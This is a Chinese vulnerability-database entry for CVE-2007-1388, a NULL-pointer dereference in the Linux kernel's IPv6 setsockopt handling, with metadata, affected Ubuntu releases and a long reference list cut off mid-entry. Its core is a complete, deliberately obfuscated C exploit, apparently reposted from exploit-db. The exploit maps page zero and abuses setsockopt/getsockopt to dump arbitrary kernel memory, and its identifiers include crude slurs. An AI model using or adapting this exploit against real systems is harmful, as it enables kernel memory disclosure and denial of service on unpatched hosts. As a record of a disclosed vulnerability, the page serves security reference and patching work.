Linux Kernel ipv6_sockglue.c空指针引用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112550 漏洞类型 资源管理错误
发布时间 2007-03-26 更新时间 2007-07-09
CVE编号 CVE-2007-1388 CNNVD-ID CNNVD-200703-306
漏洞平台 Linux CVSS评分 4.4
|漏洞来源
https://www.exploit-db.com/exploits/29781
https://www.securityfocus.com/bid/23142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-306
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel的net/ipv6/ipv6_sockglue.c文件的do_ipv6_setsockopt函数存在空指针引用问题,本地攻击者可能利用此漏洞导致内核拒绝服务。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/23142/info

The Linux kernel is prone to a NULL-pointer dereference vulnerability.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
*/


__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker
// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
#include <sys/signal.h>
typedef int fg8;
#include <sys/mman.h>
typedef long _l36;
#include <string.h>
typedef long * jayn9124;
#include <stdio.h>
typedef char * anal;
#include <netinet/in.h>
#define __exit main
#define __main exit
typedef void pleb;
#include <stdlib.h>
fg8 ___hh(fg8,_l36,jayn9124);
#include <unistd.h>
pleb _zzy();
#       define __f4 setsockopt
#       define __f5 getsockopt
fg8 __exit(fg8 argc, anal *argv[]) {
_l36 tmp;
fg8 s;
_l36 hud;
if (argc!=2) __main(-1);
if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1);
signal(SIGSEGV,&exit);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
_zzy();
__f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
___hh(s,hud,&tmp);
printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp);
return 0;
}
int ___hh(int bf,_l36 _rtg,jayn9124 rape)
{
fg8 ot=4;
*(jayn9124)(0x8) = _rtg;
return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot);
}
void _zzy()
{
_l36 *gol = NULL;
if( (gol = mmap( (void *)NULL, 4096,
PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0
)) == (void *) -1 )
{perror( "mmap" );exit(412);}
}
__ ip2.c EOF __
|受影响的产品
Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu
|参考资料

来源:BID
名称:23142
链接:http://www.securityfocus.com/bid/23142
来源:www.kernel.org
链接:http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.4
来源:VUPEN
名称:ADV-2007-1122
链接:http://www.frsirt.com/english/advisories/2007/1122
来源:MISC
链接:http://bugzilla.kernel.org/show_bug.cgi?id=8155
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1154
来源:UBUNTU
名称:USN-464-1
链接:http://www.ubuntu.com/usn/usn-464-1
来源:REDHAT
名称:RHSA-2007:0169
链接:http://www.redhat.com/support/errata/RHSA-2007-0169.html
来源:MANDRIVA
名称:MDKSA-2007:078
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
来源:SECUNIA
名称:25392
链接:http://secunia.com/advisories/25392
来源:SECUNIA
名称:25099
链接:http://secunia.com/advisories/25099
来源:SECUNIA
名称:25080
链接:http://secunia.com/advisories/25080
来源:SECUNIA
名称:24901
链接:http://secunia.com/advisories/24901
来源:SECUNIA
名称:24777
链接:http://secunia.com/advisories/24777
来源:SUSE
名称:SUSE-SA:2007:029
链接:http://lists.suse.com/archive/suse-security-announce/2007-May/0001.html
来源:MANDRI